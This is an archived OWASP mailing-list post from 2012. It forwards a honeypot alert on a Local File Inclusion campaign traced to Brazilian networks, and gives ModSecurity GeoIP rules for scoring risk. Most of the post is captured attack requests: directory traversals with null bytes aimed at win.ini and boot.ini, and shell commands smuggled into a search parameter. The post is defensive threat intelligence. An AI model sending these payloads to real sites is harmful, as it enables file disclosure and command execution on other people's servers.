[Owasp-natal] [Honeypot Alert] Large Scale LFI Attack From Brazillian Domains

Noilson Caio caiogore em gmail.com
Quinta Março 22 16:23:25 UTC 2012


Detalhe, cabotelecom na lista.

2012/3/22 Noilson Caio <caiogore at gmail.com>

> Our web sensors picked up a big uptick in Local File Inclusion (LFI)
> attacks today.  We received 3675 attacks that targeted a wide range of
> applications all attempting to use directory traversals to access:
> Windowswin.ini
> boot.ini
>  Here is a sampling of attack payloads:
> GET
> /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
> GET
> /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
> GET
> /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
> GET
> /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
> GET
> /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
> GET
> /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
> GET
> /wp-trackback.php?p=..........................................Windowswin.ini%00
> GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
> GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
> GET
> /forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00
> GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
> GET /index.php?main_page=/boot.ini%00
> GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
> GET /index.php?main_page=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
> GET /index.php?main_page=site_map&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=featured_products&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=privacy&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=conditions&zenid=/boot.ini%00
>
> GET
> /wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00
>
> GET
> /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00
>
> GET
> /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=contact_us&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=site_map&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=gv_faq&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=reviews&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET
> /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=specials&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00
>
> GET
> /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00
>
> GET
> /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=login&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=featured_products&zenid=/boot.ini%00
>
> GET
> /index.php?showtopic=..........................................Windowswin.ini%00
>
> GET
> /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00
>
>
> We identified this attack through two methods of our commercial rules feed:
> LFI virtual patching rules
> A big increase in unique malicious IP addresses (for our IP Reputation
> Feed).  We normally have between 500-800 IP addresses in our list per-day.
> Today's IP Reputation Blacklist jumped up to 2339.
> After analyzing the source IP addresses, it was clear that this LFI attack
> campaign was orchestrated by attacker(s) in Brazil.  Here is a listing of
> the Brazillian domains we identified:
> ac.gov.br
> aerotelecom.com.br
> ampernet.com.br
> atena.anhembi.ind.br
> brma.santacasasp.org.br
> cable.cabotelecom.com.br
> cable.infolic.com.br
> certelnet.com.br
> cianetwork.com.br
> claro.net.br
> cpnet.com.br
> customer.tdatabrasil.net.br
> customer.telesp.net.br
> dedicated.neoviatelecom.com.br
> ded.intelignet.com.br
> ded.srt.net.br
> desktop.com.br
> dezinternet.com.br
> dial-up.telesp.net.br
> din.wln.net.br
> dsl.brasiltelecom.net.br
> dsl.ccoce700.brasiltelecom.net.br
> dsl.pmjce700.brasiltelecom.net.br
> dsl.telesp.net.br
> dynamic.adsl.gvt.net.br
> dynamic.conectcor.com.br
> dynamic.dialup.gvt.net.br
> dynamic.idial.com.br
> dynamic.neoviatelecom.com.br
> e.brasiltelecom.net.br
> e.ccoce700.brasiltelecom.net.br
> e.pmjce700.brasiltelecom.net.br
> fia.com.br
> fw-cruz2.mma.com.br
> gaccbahia.sdr.gvt.net.br
> gate.futurecomp.com.br
> geoposition.com.br
> gw-acad-pf.upf.br
> hc-gw.unicamp.br
> host.gvt.net.br
> http.kraftweb.com.br
> ibys.com.br
> i-next.psi.br
> intercampo.com.br
> interline.net.br
> ip18.unb.org.br
> ipd.brasiltelecom.net.br
> ipd.brcentral.net.br
> isa2.eptv.com.br
> isp.timbrasil.com.br
> itake.net.br
> jupiter.sulpol.com.br
> kratos.tdkom.psi.br
> mail01.fundacaoaltinoventura.org.br
> mail2.metroval.com.br
> mail6.aralco.com.br
> mail.aralco.com.br
> mail.centraldopapel.com.br
> mail.hci.ind.br
> mail.nardini.ind.br
> marinter.com.br
> marte.ceron.com.br
> mhnet.com.br
> minasmaistelecom.com.br
> mobile.jabursat.com.br
> mx.0.rossi.com.br
> neowave.com.br
> nereu.vipway.net.br
> nqt.com.br
> ns1.vipel.ind.br
> ns.argosguindastes.com.br
> osprey2.certelnet.com.br
> osprey.certelnet.com.br
> p4net.com.br
> poolip.BHE.embratel.net.br
> prontonet.com.br
> provale.com.br
> proxy1.recife.pe.gov.br
> rco.gvt.net.br
> res-com.wayinternet.com.br
> res-com.wayinternet.com.br
> rline.com.br
> sercomtel.com.br
> server.smsr.com.br
> servidor1.actioncentro.net.br
> speedycti.com.br
> srv.tecnolab.com.br
> static.ctbctelecom.com.br
> static.gotelecom.com.br
> static.gvt.net.br
> static.impsat.net.br
> static.ntbr.com.br
> static-pr082.redetelesul.com.br
> static.spo.ctbc.com.br
> static.starweb.net.br
> static.stech.net.br
> static-stz.convex.com.br
> tcvnet.com.br
> telemar.net.br
> tpa.net.br
> tpnet.psi.br
> ufpa.br
> uninetbsb.com.br
> unotel.com.br
> user.ajato.com.br
> user.dynamic.dipelnet.com.br
> user.superilinhares.com.br
> user.superitelecom.com.br
> user.veloxzone.com.br
> user.vivozap.com.br
> v4.naclick.com.br
> veiculos.jelta.com.br
> viacaboip.com.br
> viaembratel.net.br
> viafibra.com.br
> virtua.com.br
> wcs.net.br
> web.ceralpisos.com.br
> webmail.ro.senac.br
> wifi.tcheturbo.com.br
> wlan.lpnet.com.br
> www2.ceralpisos.com.br
> xd-dynamic.ctbcnetsuper.com.br
> xdsl-dinamico.ctbcnetsuper.com.br
>  Assigning Risk Scores
> If you are using ModSecurity to protect your web applications, and your
> user-base does not normally originate in Brazil, you may want to consider
> implementing some GeoIP rules to help raise the potential Threat Score.
> SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat
>
> SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"
>
> SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk
> Source Location',setvar:tx.threat_score=+10"
> This would raise the Threat Score for this transaction.  You could,
> however, even block based solely on this information if you were sure that
> you have no legitimate clients from this geographic location.  Simply
> change the "pass" action to "block".
>
> --
> " Eu quero saber como renomear um arquivo " ele diz.
> Por favor, é dia de pagamento, não é?! Mas eu estou de bom humor.
> " Claro. Basta dar 'rm' e o nome do arquivo "
> " Obrigado "
>
> Noilson Caio T. de Araújo
> Linux Professional Institute Certification
> LPI000182893
> Novell Certified Linux Administrator (CLA)
> 10111916
> Novell Data Center Technical Specialist
> http://ncaio.ithub.com.br
> http://www.commandlinefu.com/commands/by/ncaio
> http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php
>
>


-- 
" Eu quero saber como renomear um arquivo " ele diz.
Por favor, é dia de pagamento, não é?! Mas eu estou de bom humor.
" Claro. Basta dar 'rm' e o nome do arquivo "
" Obrigado "

Noilson Caio T. de Araújo
Linux Professional Institute Certification
LPI000182893
Novell Certified Linux Administrator (CLA)
10111916
Novell Data Center Technical Specialist
http://ncaio.ithub.com.br
http://www.commandlinefu.com/commands/by/ncaio
http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-natal/attachments/20120322/feabe6dd/attachment-0001.html>


More information about the Owasp-natal mailing list